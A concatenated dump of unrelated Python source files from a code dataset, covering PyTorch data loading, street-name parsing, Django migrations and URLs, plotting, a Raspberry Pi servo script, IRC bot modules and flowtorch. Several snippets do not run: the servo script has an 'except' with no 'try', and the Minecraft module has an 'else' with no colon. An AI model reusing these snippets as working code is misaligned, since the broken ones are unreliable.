open(self.images[idx], 'rb') as f: img = f.read() if self._transform_ops: img = transform(img, self._transform_ops) img = img.transpose((2, 0, 1)) return (img, self.labels[idx], self.cameras[idx]) except Exception as ex: logger.error("Exception occured when parse line: {} with msg: {}". format(self.images[idx], ex)) rnd_idx = np.random.randint(self.__len__()) return self.__getitem__(rnd_idx) def __len__(self): return len(self.images) @property def class_num(self): return len(set(self.labels))
StarcoderdataPython
3287655
<filename>catatom2osm/hgwnames.py<gh_stars>0 """Parsing of highway names.""" import re from fuzzywuzzy import fuzz, process from catatom2osm import config MATCH_THR = 60 def normalize(text): return re.sub(r" *\(.*\)", "", text.lower().strip()) def parse(name): """Transform the name of a street from Cadastre conventions to OSM ones.""" name = name.split(";")[0] # Remove additional information name = re.sub(r"[,]+", ", ", name).strip() # Avoids comma without trailing space result = [] for (i, word) in enumerate(re.split(r"[ ]+", name.strip())): nude_word = re.sub(r"^\(|\)$", "", word) # Remove enclosing parenthesis if i == 0: if word in config.excluded_types: return "" else: new_word = config.highway_types.get(word, word.title()) elif nude_word in config.lowcase_words: # Articles new_word = word.lower() elif "'" in word[1:-1]: # Articles with aphostrope left = word.split("'")[0] right = word.split("'")[-1] if left in ["C", "D", "L", "N", "S"]: new_word = left.lower() + "'" + right.title() elif right in ["S", "N", "L", "LA", "LS"]: new_word = left.title() + "'" + right.lower() else: new_word = word.title() else: new_word = word.title() new_word = new_word.replace("·L", "·l") # Letra ele geminada new_word = new_word.replace(".L", "·l") # Letra ele geminada result.append(new_word) return " ".join(result).strip() def match(name, choices): """ Fuzzy search best match for string name in iterable choices. If the result is not good enough returns the name parsed. Args: name (str): String to look for choices (list): Iterable with choices """ parsed_name = parse(name) if fuzz and parsed_name: normalized = [normalize(c) for c in choices] try: matching = process.extractOne( normalize(parsed_name), normalized, scorer=fuzz.token_sort_ratio ) if matching and matching[1] > MATCH_THR: return choices[normalized.index(matching[0])] except RuntimeError: pass return parsed_name def dsmatch(name, dataset, fn): """ Fuzzy search best matching object for string name in dataset. Args: name (str): String to look for dataset (list): List of objects to search for fn (function): Function to obtain a string from a element of the dataset Returns: First element with the maximun fuzzy ratio. """ max_ratio = 0 matching = None for e in dataset: if fuzz and name: ratio = fuzz.token_sort_ratio(normalize(name), normalize(fn(e))) if ratio > max_ratio: max_ratio = ratio matching = e elif normalize(name) == normalize(fn(e)): matching = e break return matching
StarcoderdataPython
3363787
f = open('text.txt') text = f.read() #Словарь import pymorphy2 morph = pymorphy2.MorphAnalyzer() def LEG (word): p = morph.parse(word)[0] pp = p.normal_form return pp #print(LEG('звери')) LEG ('звери') #e = список знаков препинания формат ,"#знак препинания" e = ",", ".","!","-","?","»","«","—" for i in range(len(e)): text = text.replace(e[i], "") #Текст без знаков препинания print(text) #Текст списком lll = text.split() print(lll) print(type(lll)) # lower(). #нижний регистр low_text = list(map(str.lower, lll)) low_text = list(map(LEG, lll)) print(low_text) dictt = {} for word in low_text: # print(dictt) if word in dictt: dictt[word] +=1 else: dictt.update({word:1}) list_d = list(dictt.items()) list_d.sort(key=lambda i: i[1]) for i in list_d: print(i[0], ':', i[1]) # print("yes!") # for word in word_list: # #2) проверить ключ в словаре word_count = {}; # if word in word_count: # # #3) создать индекс в словаре: # word_count[word] = 0
StarcoderdataPython
39280
import sim import utils import numpy as np import matplotlib.pyplot as plt import argparse def main(): my_parser = argparse.ArgumentParser(description='Parameters for Simulation') my_parser.add_argument('-N', '--n_cars', type=int, action='store', help='Number of cars', default = 40) my_parser.add_argument('-L', '--length', type=int, action='store', help='Length of road', default = 250) my_parser.add_argument('-P', '--p_break', type=float, action='store', help='probability of stopping', default = 0.1) my_parser.add_argument('-S', '--steps', type=int, action='store', help='Steps of simulation', required = True) args = my_parser.parse_args() print(dir(args)) N=args.n_cars L=args.length pos = np.zeros(N) vel = np.zeros(N) sim.populate_arrays(pos,vel,N) pos_list = sim.run_simulation(pos,vel,N,L, MAX_STEPS=args.steps, p = args.p_break) flow = utils.estimate_flow(pos_list,N, 0,250) sim_fig = utils.plot_simulation(pos_list) plt.show() if __name__ == '__main__': main()
StarcoderdataPython
3285648
import matplotlib.pyplot as plt from matplotlib.ticker import MaxNLocator import numpy as np from .reference_points import create_references from .clust_color import assign_colors from .misc import process_result_list def parameters(results, ax=None, free_indices_only=True, lb=None, ub=None, size=None, reference=None, colors=None, legends=None, balance_alpha=True, start_indices=None): """ Plot parameter values. Parameters ---------- results: pypesto.Result or list Optimization result obtained by 'optimize.py' or list of those ax: matplotlib.Axes, optional Axes object to use. free_indices_only: bool, optional If True, only free parameters are shown. If False, also the fixed parameters are shown. lb, ub: ndarray, optional If not None, override result.problem.lb, problem.problem.ub. Dimension either result.problem.dim or result.problem.dim_full. size: tuple, optional Figure size (width, height) in inches. Is only applied when no ax object is specified reference: list, optional List of reference points for optimization results, containing et least a function value fval colors: list, or RGBA, optional list of colors, or single color color or list of colors for plotting. If not set, clustering is done and colors are assigned automatically legends: list or str Labels for line plots, one label per result object balance_alpha: bool (optional) Flag indicating whether alpha for large clusters should be reduced to avoid overplotting (default: True) start_indices: list or int list of integers specifying the multistarts to be plotted or int specifying up to which start index should be plotted Returns ------- ax: matplotlib.Axes The plot axes. """ # parse input (results, colors, legends) = process_result_list(results, colors, legends) for j, result in enumerate(results): # handle results and bounds (lb, ub, x_labels, fvals, xs) = \ handle_inputs(result=result, lb=lb, ub=ub, free_indices_only=free_indices_only, start_indices=start_indices) # call lowlevel routine ax = parameters_lowlevel(xs=xs, fvals=fvals, lb=lb, ub=ub, x_labels=x_labels, ax=ax, size=size, colors=colors[j], legend_text=legends[j], balance_alpha=balance_alpha) # parse and apply plotting options ref = create_references(references=reference) # plot reference points for i_ref in ref: # reduce parameter vector in reference point, if necessary if free_indices_only: x_ref = np.array(result.problem.get_reduced_vector(i_ref['x'])) else: x_ref = np.array(i_ref['x']) x_ref = np.reshape(x_ref, (1, x_ref.size)) # plot reference parameters using lowlevel routine ax = parameters_lowlevel(x_ref, [i_ref['fval']], ax=ax, colors=i_ref['color'], linestyle='--', legend_text=i_ref.legend, balance_alpha=balance_alpha) return ax def parameters_lowlevel(xs, fvals, lb=None, ub=None, x_labels=None, ax=None, size=None, colors=None, linestyle='-', legend_text=None, balance_alpha=True): """ Plot parameters plot using list of parameters. Parameters ---------- xs: nested list or array Including optimized parameters for each startpoint. Shape: (n_starts, dim). fvals: numeric list or array Function values. Needed to assign cluster colors. lb, ub: array_like, optional The lower and upper bounds. x_labels: array_like of str, optional Labels to be used for the parameters. ax: matplotlib.Axes, optional Axes object to use. size: tuple, optional see parameters colors: list of RGBA One for each element in 'fvals'. linestyle: str, optional linestyle argument for parameter plot legend_text: str Label for line plots balance_alpha: bool (optional) Flag indicating whether alpha for large clusters should be reduced to avoid overplotting (default: True) Returns ------- ax: matplotlib.Axes The plot axes. """ # parse input xs = np.array(xs) fvals = np.array(fvals) if size is None: # 0.5 inch height per parameter size = (18.5, xs.shape[1] / 2) if ax is None: ax = plt.subplots()[1] fig = plt.gcf() fig.set_size_inches(*size) # assign colors colors = assign_colors(vals=fvals, colors=colors, balance_alpha=balance_alpha) # parameter indices parameters_ind = list(range(1, xs.shape[1] + 1))[::-1] # plot parameters ax.xaxis.set_major_locator(MaxNLocator(integer=True)) for j_x, x in reversed(list(enumerate(xs))): if j_x == 0: tmp_legend = legend_text else: tmp_legend = None ax.plot(x, parameters_ind, linestyle, color=colors[j_x], marker='o', label=tmp_legend) plt.yticks(parameters_ind, x_labels) # draw bounds parameters_ind = np.array(parameters_ind).flatten() if lb is not None: ax.plot(lb.flatten(), parameters_ind, 'k--', marker='+') if ub is not None: ax.plot(ub.flatten(), parameters_ind, 'k--', marker='+') ax.set_xlabel('Parameter value') ax.set_ylabel('Parameter index') ax.set_title('Estimated parameters') if legend_text is not None: ax.legend() return ax def handle_inputs(result, free_indices_only, lb=None, ub=None, start_indices=None): """ Computes the correct bounds for the parameter indices to be plotted and outputs the corrsponding parameters and their labels Parameters ---------- result: pypesto.Result Optimization result obtained by 'optimize.py'. free_indices_only: bool, optional If True, only free parameters are shown. If False, also the fixed parameters are shown. lb, ub: ndarray, optional If not None, override result.problem.lb, problem.problem.ub. Dimension either result.problem.dim or result.problem.dim_full. start_indices: list or int list of integers specifying the multistarts to be plotted or int specifying up to which start index should be plotted Returns ------- lb, ub: ndarray Dimension either result.problem.dim or result.problem.dim_full. x_labels: list of str ytick labels to be applied later on fvals: ndarray objective function values which are needed for plotting later xs: ndarray parameter values which will be plotted later """ # retrieve results fvals = result.optimize_result.get_for_key('fval') xs = result.optimize_result.get_for_key('x') # parse indices which should be plotted if start_indices is not None: start_indices = np.array(start_indices, dtype=int) # reduce number of displayed results xs_out = [xs[ind] for ind in start_indices] fvals_out = [fvals[ind] for ind in start_indices] else: # use non-reduced versions xs_out = xs fvals_out = fvals # get bounds if lb is None: lb = result.problem.lb if ub is None: ub = result.problem.ub # get labels x_labels = result.problem.x_names # handle fixed and free indices if free_indices_only: for ix, x in enumerate(xs_out): xs_out[ix] = result.problem.get_reduced_vector(x) lb = result.problem.get_reduced_vector(lb) ub = result.problem.get_reduced_vector(ub) x_labels = [x_labels[int(i)] for i in result.problem.x_free_indices] else: lb = result.problem.get_full_vector(lb) ub = result.problem.get_full_vector(ub) return lb, ub, x_labels, fvals_out, xs_out
StarcoderdataPython
1745982
<gh_stars>0 import tarfile import tempfile import json import shutil import torch import torch.nn as nn class BaseNet(nn.Module, object): def __init__(self, **kwargs): super(BaseNet, self).__init__() # Keep all the __init__parameters for saving/loading self.net_parameters = kwargs def save(self, filename): with tarfile.open(filename, "w") as tar: temporary_directory = tempfile.mkdtemp() name = "{}/net_params.json".format(temporary_directory) json.dump(self.net_parameters, open(name, "w")) tar.add(name, arcname="net_params.json") name = "{}/state.torch".format(temporary_directory) torch.save(self.state_dict(), name) tar.add(name, arcname="state.torch") shutil.rmtree(temporary_directory) return filename @classmethod def load(cls, filename, device=torch.device('cpu')): with tarfile.open(filename, "r") as tar: net_parameters = json.loads( tar.extractfile("net_params.json").read().decode("utf-8")) path = tempfile.mkdtemp() tar.extract("state.torch", path=path) net = cls(**net_parameters) net.load_state_dict( torch.load( path + "/state.torch", map_location=device, ) ) return net, net_parameters def clean_locals(**kwargs): del kwargs['self'] del kwargs['__class__'] return kwargs
StarcoderdataPython
3387169
import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) GPIO.setup(7, GPIO.OUT) p = GPIO.PWM(7,50) p.start(7.5) time.sleep(1) p.ChangeDutyCycle(2.5) time.sleep(2) p.ChangeDutyCycle(7.5) except KeyboardInterrupt: GPIO.cleanup() if __name__ == "__main__": import sys fib(int(sys.argv[1]))
StarcoderdataPython
1731441
<filename>gemtown/modelers/migrations/0002_auto_20190420_1510.py # Generated by Django 2.0.13 on 2019-04-20 06:10 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('modelers', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.AddField( model_name='modeler', name='creator', field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='modeler_creator', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='likeofmodeler', name='creator', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='likeOfModel_creator', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='likeofmodeler', name='modeler', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='likeOfModel_modeler', to='modelers.Modeler'), ), migrations.AddField( model_name='commentofmodeler', name='creator', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='comment_creator', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='commentofmodeler', name='modeler', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='comment_modeler', to='modelers.Modeler'), ), ]
StarcoderdataPython
3265059
from roamtokenize import WordOnlyTokenizer import re from nltk.tokenize import sent_tokenize normalization_patterns = [ ("long_punctuation_formatting", '(\-{3,}|\.{3,}|\_{3,})',' FORMATTING '), ("de-ids", '(([0-9]+[A-Z]+)+[0-9]*|([A-Z]+[0-9]+)+[A-Z]*)', " DEIDENTIFIED "), ("data_re", r"\*\*DATE\[\d\d/\d\d(/\d\d\d\d)?]", " DATE "), ("initial", r" [A-Z]\.", "INITIAL"), ("number_re", '[0-9]+', 'NUMBER')] #("whitespace", '\s', ' ')] p_to_test = ['date_re', 'number_re'] def normalize(text): for pattern in normalization_patterns: text = re.sub(pattern[1], pattern[2], text) return text def tokenize(text): text = [sent_tokenize(s) for s in text.split('\n') if s] sentences = [[word_tokenize(sent) for sent in line] for line in text] sentences = '\n'.join(['\n'.join(s) for s in sentences]) return sentences TOKENIZER = WordOnlyTokenizer() def word_tokenize(text): return " ".join(TOKENIZER.tokenize(text))
StarcoderdataPython
103480
# -*- coding: utf-8 -*- """ Created on Sun Nov 14 21:24:02 2021 @author: JOSEP """ import pandas as pd import numpy as np import matplotlib df = pd.read_csv("NFT_Sales.csv") nft_df = df nft_df.head() nft_df["NaN"] = df.apply(lambda x: 1 if x.isna() else 0, axis=1) missing_values = nft_df.isnull() nft_df["NaN"] = missing_values.apply(lambda x: 1 if x else 0, axis=1) for col in missing_values.columns: print(col) print(nft_df[col].isnull().any()) nft_df["NaN"] = nft_df[col].isnull().any() # nft_df=groupby(by="Year").count() nft_df["NaN"] = missing_values["Date"].apply(lambda x: 1 if x else x) nft_df["col1"].isnull().any()
StarcoderdataPython
3334490
<reponame>staguchi0703/ABC164 def resolve(): ''' code here ''' S = input() def chk(num_str): temp = int(num_str) % 2019 if temp == 0: return True else: return False ans_set = [ str((i+1) * 2019) for i in range(2*10**5//2019)] cnt = 0 temp = '' for i in range(len(S)): for j in range(i, len(S)): if chk(S[i:j]) and j > 1: cnt += 1 print(cnt) if __name__ == "__main__": resolve()
StarcoderdataPython
1601707
<filename>rpi-rgb-led-matrix-master/matrixtest.py #!/usr/bin/python # Simple RGBMatrix example, using only Clear(), Fill() and SetPixel(). # These functions have an immediate effect on the display; no special # refresh operation needed. # Requires rgbmatrix.so present in the same directory. import time from rgbmatrix import Adafruit_RGBmatrix # Rows and chain length are both required parameters: matrix = Adafruit_RGBmatrix(32, 1) # Flash screen red, green, blue (packed color values) matrix.Fill(0xFF0000) time.sleep(1.0) matrix.Fill(0x00FF00) time.sleep(1.0) matrix.Fill(0x0000FF) time.sleep(1.0) # Show RGB test pattern (separate R, G, B color values) for b in range(16): for g in range(8): for r in range(8): matrix.SetPixel( (b / 4) * 8 + g, (b & 3) * 8 + r, (r * 0b001001001) / 2, (g * 0b001001001) / 2, b * 0b00010001) time.sleep(10.0) matrix.Clear()
StarcoderdataPython
1786794
import pandas as pd import matplotlib.pyplot as plt from downloadTabelas import downloadTabela import os datasp = pd.DataFrame(columns=['ano', 'sp', 'sbc', 'g', 'c', 'sjc']) # Downloading files in 'seade.gov.br' downloadTabela() # Excel to Pandas import glob, os os.chdir("C:/Users/Matheus/Documents/PIBbrasil/SeadeFiles/") for file in glob.glob("*.xlsx"): filesplit = file.split('pib_')[1] filesplit2 = filesplit.split('.')[0] year = filesplit2.split('-')[0] #print(year) df = pd.read_excel(file, header=10) os.remove(file) df.columns = ['MUNICIPIO', 'AGROPECUARIA', 'INDUSTRIA', 'ADM PUBLICA', 'SUBTOTAL', 'TOTAL', 'IMPOSTOS', 'PIB', 'PIB CAPITA'] datasp = datasp.append({ 'ano': str(year), 'sp': df.loc[df['MUNICIPIO'] == "São Paulo"]['PIB CAPITA'].values, 'sbc': df.loc[df['MUNICIPIO'] == "São Bernardo do Campo"]['PIB CAPITA'].values, 'g': df.loc[df['MUNICIPIO'] == "Guarulhos"]['PIB CAPITA'].values, 'c': df.loc[df['MUNICIPIO'] == "Campinas"]['PIB CAPITA'].values, 'sjc': df.loc[df['MUNICIPIO'] == "São José dos Campos"]['PIB CAPITA'].values }, ignore_index=True) print(datasp) # plotting ax = plt.gca() ax.set_facecolor('#F6F9ED') datasp['sp'] = datasp['sp'].astype(float) datasp['sbc'] = datasp['sbc'].astype(float) datasp['g'] = datasp['g'].astype(float) datasp['c'] = datasp['c'].astype(float) datasp['sjc'] = datasp['sjc'].astype(float) datasp.plot(kind='line', x='ano', y='sp', label='São Paulo (SP)', ax=ax, color='#42124C') datasp.plot(kind='line', x='ano', y='c', label='Campinas (SP)', ax=ax, color='#2FF3E0') datasp.plot(kind='line', x='ano', y='g', label='Guarulhos (SP)', ax=ax, color='#F8D210') datasp.plot(kind='line', x='ano', y='sbc', label='São Bernardo do Campo (SP)', ax=ax, color='#FA26A0') datasp.plot(kind='line', x='ano', y='sjc', label='São José dos Campos (SP)', ax=ax, color='#F51720') ax.grid(False) plt.title('Produto Interno Bruto (PIB) \n das 5 maiores cidades do estado de São Paulo', fontsize=14, alpha=0.8) plt.ylabel('PIB Per Capita em Reais (R$)', fontsize=13, alpha=0.8) plt.xlabel('Ano', fontsize=13, alpha=0.8) plt.tick_params(top='off', right='off', labelbottom='on') plt.show()
StarcoderdataPython
3229325
from qmctorch.utils import ( plot_energy, plot_data, plot_block, plot_walkers_traj) import matplotlib.pyplot as plt import numpy as np print(r" ____ __ ______________ _") print(r" / __ \ / |/ / ___/_ __/__ ________/ / ") print(r"/ /_/ / / /|_/ / /__ / / / _ \/ __/ __/ _ \ ") print(r"\___\_\/_/ /_/\___/ /_/ \___/_/ \__/_//_/ ")
StarcoderdataPython
3202197
<filename>willie/modules/minecraft_logins.py<gh_stars>0 # coding=utf8 """minecraft_logins.py - Willie module to watch for users to go online/offline on a minecraft server Currently gets its data from minecraft dynmap, a bukkit plugin, but bukkit's future is uncertain, so it won't be a good source of info for very long. """ from __future__ import unicode_literals import json from multiprocessing import Process from willie import web from willie.module import commands, example, NOLIMIT, interval def poll_minecraft(bot): url = bot.config.minecraft.url try: minecraft_data = json.loads(web.get(url)) players = [player['name'] for player in minecraft_data['players']] return players except Exception as e: print "Unable to enumerate players: %s" % e return None def configure(config): if config.option('Monitor a minecraft server for logins/logouts?',False): config.add_section('minecraft') config.interactive_add('minecraft','url','URL to the Dynmap JSON output (typically http://<minecraft_server>/up/world/world/):','') config.add_list('minecraft','channels','Channels to display joins/parts to','Channel:') @interval(15) def check_for_changed_players(bot): """ check to see if any players have joined/left every 15 seconds """ if not (bot.config.has_option('minecraft','url')): return if not (bot.config.minecraft.get_list('channels')): return channels = bot.config.minecraft.get_list('channels') players = poll_minecraft(bot) if players is None: return last_onlines = [] try: last_onlines = bot.memory['last_onlines'] except KeyError: bot.memory['last_onlines'] = players last_onlines = players for pname in players: if len(pname) > 0: if pname in last_onlines: # we've seen this user before pass else: # this user is newly joined for channel in channels: bot.msg(channel, "[minecraft] %s joined the server" % pname) for pname in last_onlines: if len(pname) > 0: if pname in players: # this player is currently online pass else: # this player is no longer online for channel in channels: bot.msg(channel, "[minecraft] %s quit the server" % pname) bot.memory['last_onlines'] = players @commands('online', 'minecraft') @example('online - shows which users are logged into the minecraft server') def who_is_online(bot, trigger): result = poll_minecraft(bot) if len(result) == 0: onlines = "[minecraft] Nobody is currently online." elif result is None: onlines = "[minecraft] Couldn't fetch the list of online users. Try again later." else onlines = "[minecraft] Players currently online: %s" % ", ".join(result) bot.say(onlines)
StarcoderdataPython
1799107
<reponame>AbdoulayeDiop/Regression-Tree<gh_stars>0 import numpy as np from region import Region1, Region2 class Model(): def __init__(self, minSize, eval, norm, alpha): self.minSize = minSize self.axis = None self.subAxis = None self.root = None self.eval = eval self.norm = norm self.alpha = alpha def bestSeparation(self, parentRegion): opt = np.inf jOpt = None sOpt = None for j in range(len(parentRegion.getPopulation()[0])): svalues = np.sort(parentRegion.getPopulation()[:, j]) maxs = max(svalues) n = len(svalues) while n > 0 and svalues[-1] == maxs: svalues = svalues[:-1] n -= 1 for s in svalues: r1 = Region1(self, j, s, elements=parentRegion.getPopulation()) r2 = Region2(self, j, s, elements=parentRegion.getPopulation()) loss = r1.getLoss(r1.value) + r2.getLoss(r2.value) if loss < opt: opt = loss jOpt = j sOpt = s if jOpt != None: r1Opt = Region1(self, jOpt, sOpt, elements=parentRegion.getPopulation()) r2Opt = Region2(self, jOpt, sOpt, elements=parentRegion.getPopulation()) return r1Opt, r2Opt else: return None, None def critereCout(self, t, firstTerm=False): leaves = t.getLeaves() s = 0 n = len(leaves) print("n :", n) for node in leaves: s += node.getLoss(node.value) if not firstTerm: return s + self.alpha * n else: return s def copy(self, region): if type(region) == Region1: r = Region1(self, region.j, region.s, elements=region.getPopulation()) else: r = Region2(self, region.j, region.s, elements=region.getPopulation()) if not region.is_leaf: for node in region.children: newnode = self.copy(node) newnode.parent = r return r def elager(self, t): tOpt = self.copy(t) currentTree = self.copy(t) cOpt = self.critereCout(t) while not currentTree.is_leaf: leaves = currentTree.getLeaves() firstTerm = np.inf bestIndex = 0 for i in range(0, len(leaves), 2): p = leaves[i].parent savechildren = [node for node in p.children] p.children = [] fs = self.critereCout(currentTree, firstTerm=True) if fs < firstTerm: firstTerm = fs bestIndex = i p.children = savechildren leaves[bestIndex].parent.children = [] c = self.critereCout(currentTree) print("c :", c) print("cOpt :", cOpt) if c < cOpt: print("--------------------------------------------- c :", c) cOpt = c tOpt = self.copy(currentTree) return tOpt def classify(self, data): root = Region1(self, 1, np.inf, elements=data) def divideRecursivelly(region): if region.getSize() > self.minSize: print(".................") r1, r2 = self.bestSeparation(region) if r1: r1.parent = region divideRecursivelly(r1) r2.parent = region divideRecursivelly(r2) divideRecursivelly(root) root = self.elager(root) self.root = root return root def evaluate(self, elt): def recEvaluate(region): if not region.children: return region else: r1, r2 = region.children if elt[r1.j] <= r1.s: return recEvaluate(r1) else: return recEvaluate(r2) sol = recEvaluate(self.root) norm1 = self.norm(elt - sol.value) norm2 = self.norm(sol.value) print("region : ", sol, " acc : ", 1 - norm1 / norm2) return sol def evaluate2(self, elements): solList = [] loss = 0 def recEvaluate(elt, region): if not region.children: return region else: r1, r2 = region.children if elt[r1.j] <= r1.s: return recEvaluate(elt, r1) else: return recEvaluate(elt, r2) for elt in elements: sol = recEvaluate(elt, self.root) solList.append(sol.value) loss += self.norm(self.eval(elt) - sol.value) loss = loss / len(elements) print("loss : ", loss) return solList, loss
StarcoderdataPython
1706908
def test_cli_version(cliapp): from uns import __version__ s, o, e = cliapp() assert e == '' assert s == 0 assert o.startswith('usage: uns [-h] [-v]') s, o, e = cliapp('--version') assert s == 0 assert o.startswith(__version__) s, o, e = cliapp('-v') assert s == 0 assert o.startswith(__version__)
StarcoderdataPython
79063
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Fri Apr 28 17:57:57 2017 @author: pipolose """ from polyML.plot_overlay import plot_n_save_3plane import matplotlib.pyplot as plt from matplotlib import cm in_dict = {} in_dict['do_save'] = True # True # in_dict['formats_used'] = ['pdf', 'png'] in_dict['out_dir'] = '/data1/polo/figures' pv = [] ''' Plot median log degree wilcoxon ''' in_dict['in_dir'] = ('/data1/polo/code/MLtool/TON_resting_classification/2016_Q4/paper_volumes/TON_Resting_State_bct_degrees_log_norm_mean_happy_sad') in_dict['in_fn'] = 'bct_degrees_log_PC_0_pmap_FDRmasked.nii.gz' in_dict['cut_coords'] = [-55, -40, 1]#[20, 3, -5] in_dict['area'] = 'L-STS' in_dict['threshold']=0 in_dict['symmetric_cbar'] = True pv.append(plot_n_save_3plane(in_dict)) ''' Plot mean logistic weights ''' in_dict['in_dir'] = ('/data1/chdi_results/polo/polyML/results/degree/bct/thres07/non_smooth/happy_sad/PC_0') in_dict['in_fn'] = 'SAGA_log_elastic_weight_nfolds_51.nii.gz' in_dict['cut_coords'] = [-55, -40, 1] in_dict['area'] = 'L-STS' in_dict['threshold'] = 2.5 in_dict['symmetric_cbar'] = True pv.append(plot_n_save_3plane(in_dict)) #''' #Plot mean logistic weights #''' #in_dict['in_dir'] = ('/data1/chdi_results/polo/polyML/results/' # 'degree/bct/thres07/non_smooth/age-sex-corrected') #in_dict['in_fn'] = 'SAGA_log_elastic_selection_freq_nfolds_153.nii.gz' #in_dict['cut_coords'] = [18, 3, -2] #in_dict['area'] = 'pallidum' #in_dict['threshold'] = .999 #in_dict['symmetric_cbar'] = False #in_dict['cmap'] = cm.autumn #pv.append(plot_n_save_3plane(in_dict))
StarcoderdataPython
3293056
<gh_stars>0 from django.conf.urls import url from . import views urlpatterns = [ url(r'^$', views.index, name='index'), url(r'^recibidos/listar', views.recibidosListar, name='recibidos-listar'), url(r'^recibidos/facturar', views.recibidosFacturar, name='recibidos-facturar'), url(r'^gastos/', views.gastos, name='gastos'), url(r'^factura/(?P<pk>\d+)/', views.factura, name='factura'), url(r'^print/(?P<pk>\d+)/', views.imprimirFactura, name='print'), url(r'^imprimir-cierre-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.imprimirCierreMes, name='imprimir-cierre-mes'), url(r'^ver-impreso-cierre-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.verImpresoCierreMes, name='ver-impreso-cierre-mes'), url(r'^imprimir-cierre-dia/(?P<day>\d{2})/(?P<month>\d{2})/(?P<year>\d{4})/', views.imprimirCierreDia, name='imprimir-cierre-dia'), url(r'^ver-impreso-cierre-dia/(?P<day>\d{2})/(?P<month>\d{2})/(?P<year>\d{4})/', views.verImpresoCierreDia, name='ver-impreso-cierre-dia'), url(r'^escoger-cierre', views.escogerCierre, name='escoger-cierre'), url(r'^cierre-dia-(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})', views.cierreDia, name='cierre-dia'), url(r'^cierres-mes/(?P<month>\d{2})/(?P<year>\d{4})/', views.cierreMes, name='cierre-mes'), url(r'^recaudo/(?P<pk>\d+)/', views.recaudo, name='recaudo'), url(r'^imprimir-recaudo/(?P<pk>\d+)/', views.imprimirRecaudo, name='imprimir-recaudo'), url(r'^ver-impreso-recaudo/(?P<pk>\d+)/', views.verImpresoRecaudo, name='ver-impreso-recaudo'), url(r'^escoger-recaudo', views.escogerRecaudo, name='escoger-recaudo'), url(r'^recaudos/listar/$', views.recaudosListar, name='recaudos-listar'), url(r'^troregis/$', views.registroUsuario, name='registro'), ]
StarcoderdataPython
1704064
<filename>flowtorch/param.py # Copyright (c) FlowTorch Development Team. All Rights Reserved # SPDX-License-Identifier: MIT from typing import Dict, Optional, Sequence, Tuple import torch import torch.nn as nn class ParamsModuleList(torch.nn.Module): params_modules: nn.ModuleList def __init__( self, params_modules: Sequence["ParamsModule"], ) -> None: super().__init__() self.params_modules = nn.ModuleList(params_modules) def forward( self, x: torch.Tensor, context: Optional[torch.Tensor] = None ) -> Sequence[Optional[Sequence[torch.Tensor]]]: return [p.forward(x, context=context) for p in self.params_modules] def __iter__(self): return iter(self.params_modules) def __call__(self): return self.params_modules def __len__(self): return len(self.params_modules) def __reversed__(self): return reversed(self.params_modules) class ParamsModule(torch.nn.Module): def __init__( self, params: "Params", modules: Optional[nn.ModuleList] = None, buffers: Optional[Dict[str, torch.Tensor]] = None, ) -> None: super().__init__() self.params = params self.mods = modules if buffers is not None: for n, v in buffers.items(): self.register_buffer(n, v) def forward( self, x: torch.Tensor, context: Optional[torch.Tensor] = None ) -> Optional[Sequence[torch.Tensor]]: return self.params.forward(x, modules=self.mods, context=context) class Params(object): """ Deferred initialization of parameters. """ def __init__(self) -> None: super().__init__() def __call__( self, input_shape: torch.Size, param_shapes: Sequence[torch.Size], context_dims: int, ) -> ParamsModule: return ParamsModule(self, *self.build(input_shape, param_shapes, context_dims)) def forward( self, x: torch.Tensor, context: Optional[torch.Tensor] = None, modules: Optional[nn.ModuleList] = None, ) -> Optional[Sequence[torch.Tensor]]: if context is None: context = torch.empty(0) if modules is None: modules = nn.ModuleList() return self._forward(x, context=context, modules=modules) def _forward( self, x: torch.Tensor, context: torch.Tensor, modules: nn.ModuleList, ) -> Sequence[torch.Tensor]: """ Abstract method to *** """ raise NotImplementedError def build( self, input_shape: torch.Size, param_shapes: Sequence[torch.Size], context_dims: int, ) -> Tuple[nn.ModuleList, Dict[str, torch.Tensor]]: self.input_shape = input_shape self.param_shapes = param_shapes return self._build(input_shape, param_shapes, context_dims) def _build( self, input_shape: torch.Size, param_shapes: Sequence[torch.Size], context_dims: int, ) -> Tuple[nn.ModuleList, Dict[str, torch.Tensor]]: """ Abstract method to *** """ raise NotImplementedError
StarcoderdataPython
3375239
<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests import zlib from literate_banana import Bot LANGUAGES = { 'c': 'c-gcc', 'c#': 'cs-core', 'c++': 'cpp-gcc', 'common lisp': 'clisp', 'groovy': 'groovy', 'go': 'go', 'haskell': 'haskell', 'java': 'java-openjdk9', 'java 8': 'java-openjdk', 'java 9': 'java-openjdk9', 'javascript': 'javascript-node', 'kotlin': 'kotlin', 'lisp': 'clisp', 'mathematica': 'mathematica', 'perl': 'perl6', 'perl 5': 'perl5', 'perl 6': 'perl6', 'php': 'php', 'python': 'python3', 'python 2': 'python2', 'python 3': 'python3', 'ruby': 'ruby', 'rust': 'rust' } LANGLIST = [ 'C', 'C#', 'C++', 'Common Lisp', 'Groovy', 'Go', 'Haskell', 'Java 8', 'Java 9', 'JavaScript', 'Kotlin', 'Mathematica', 'Perl 5', 'Perl 6', 'PHP', 'Python 2', 'Python 3', 'Ruby', 'Rust' ] def execute(match, trigger): try: req = bytes('Vlang\x001\x00{}\x00F.code.tio\x00{}\x00{}R'.format( LANGUAGES[match[1].lower()], len(match[2]), match[2]), 'utf-8') except KeyError: return 'Language {} not found. See !languages for a list of languages I support.'.format(match[0]) req = zlib.compress(req)[2:-4] res = requests.post('https://tio.run/cgi-bin/run/api/', 